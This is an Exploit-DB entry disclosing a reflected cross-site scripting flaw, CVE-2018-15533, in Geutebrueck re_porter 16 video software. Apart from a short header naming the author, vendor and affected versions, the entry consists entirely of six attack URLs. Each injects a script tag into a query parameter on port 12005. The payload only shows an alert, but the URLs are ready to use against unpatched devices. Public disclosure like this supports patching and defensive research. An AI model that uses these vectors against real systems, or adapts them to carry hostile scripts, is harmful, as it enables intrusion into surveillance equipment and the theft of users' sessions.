Geutebrueck re_porter 16 - Cross-Site Scripting

EDB-ID:

45242




Platform:

Hardware

Date:

2018-08-22


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Geutebrueck re_porter 16 - Cross-Site Scripting
# Date: 2018-08-03
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15533

# Attack Vectors
http://example.com:12005/modifychannel/exec?vv9r7<script>alert(1)</script>auubw=1

http://example.com:12005/images/IOMemoryPool.png?ebmf6<script>alert(1)</script>pmsih=1

http://example.com:12005/images/Statistics.png?q3dlx<script>alert(1)</script>zjvdw=1

http://example.com:12005/images/GLIBBackground.jpg?itfvf<script>alert(1)</script>irvnl=1

http://example.com:12005/images/MainMemoryPool.png?bzu69<script>alert(1)</script>m2hhj=1

http://example.com:12005/images/ProcessMemory.png?f4d7j<script>alert(1)</script>m5by3=